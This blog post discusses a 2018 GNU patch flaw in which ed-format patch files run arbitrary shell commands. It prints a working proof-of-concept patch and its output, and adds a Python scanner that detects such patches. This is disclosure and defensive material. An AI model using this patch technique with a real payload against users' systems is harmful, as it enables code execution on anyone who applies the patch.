
Thursday, April 5, 2018

patch runs ed, and ed can run anything

Okay, this is kind of awesome, if you like watching the world burn.

The short version is: patch runs ed... and ed can run arbitrary commands, including when it's called from patch.

Check this out. I've taken the proof of concept and changed it slightly:

$ cat evil.patch
--- /dev/null   2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!touch /tmp/0wned; ls -la /tmp/0wned
.
$ patch < evil.patch
?
?
-rw-r--r-- 1 edu users 0 Apr  5 10:42 /tmp/0wned
?
patch: **** /usr/bin/ed FAILED
$
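As an added example (not from the post, and not GNU patch's own code), here is a small Python checker that classifies a patch file's hunk format and lists the lines ed would treat as shell escapes, so an ed-style patch like the one above can be refused before patch ever spawns ed. The function names `scan_patch` and `is_safe_to_apply` are mine, and both sample patches are constructed inline.

```python
import re

# Constructed sample: the proof-of-concept patch from the post.
EVIL_PATCH = """\
--- /dev/null   2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!touch /tmp/0wned; ls -la /tmp/0wned
.
"""

# Constructed sample: an ordinary unified diff for comparison.
UNIFIED_PATCH = """\
--- a/beep.c
+++ b/beep.c
@@ -1 +1 @@
-    return 1;
+    return 0;
"""

HEADER = re.compile(r"^(---|\+\+\+|Index:|diff |={3,})")
# ed command with an address, e.g. "1337a", "1,112d", "5s/x/y/"
ED_COMMAND = re.compile(r"^(\d+|\$|\.)(,(\d+|\$|\.))?[acdis]")
# "!cmd", "r !cmd" or "w !cmd": ed hands cmd to the shell
SHELL_ESCAPE = re.compile(r"^(?:[\d,.$ ]*[rw]\s*)?!")

def scan_patch(text: str) -> dict:
    """Return the hunk format and every line ed could run as a shell escape."""
    body = [ln for ln in text.splitlines() if ln and not HEADER.match(ln)]
    first = body[0] if body else ""
    if first.startswith("@@"):
        fmt = "unified"
    elif first.startswith("***"):
        fmt = "context"
    elif ED_COMMAND.match(first):
        fmt = "ed"
    else:
        fmt = "unknown"
    escapes = []
    if fmt == "ed":
        # Flag '!' lines anywhere, not only in command mode: after "1337a"
        # the next lines look like append-mode text, but ed rejects the
        # out-of-range address ("?"), stays in command mode and runs them.
        escapes = [ln for ln in body if SHELL_ESCAPE.match(ln)]
    return {"format": fmt, "shell_escapes": escapes}

def is_safe_to_apply(text: str) -> bool:
    """Accept only unified or context diffs, which patch applies without ed."""
    return scan_patch(text)["format"] in ("unified", "context")
```

Run it over a patch before piping it into patch(1); anything reported as "ed" with a non-empty shell_escapes list is the case shown in the session above.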

This came up as part of the discussion on the "beep exploit" yesterday. I found it buried in the HN /new queue as a simple link to the Debian bug tracker.

This seems far too good to leave hidden in there.

Subprocesses, am I right?

Late update: it looks like FreeBSD fixed this same sort of thing in 2015. GNU patch, however (shown above), clearly has not.

Another update: OpenBSD also patched it in 2015. It looks like they had it first, which I suppose makes sense. Also, I'm hearing it can't exec other programs any more, which is pretty awesome. That's the right way to close this kind of door.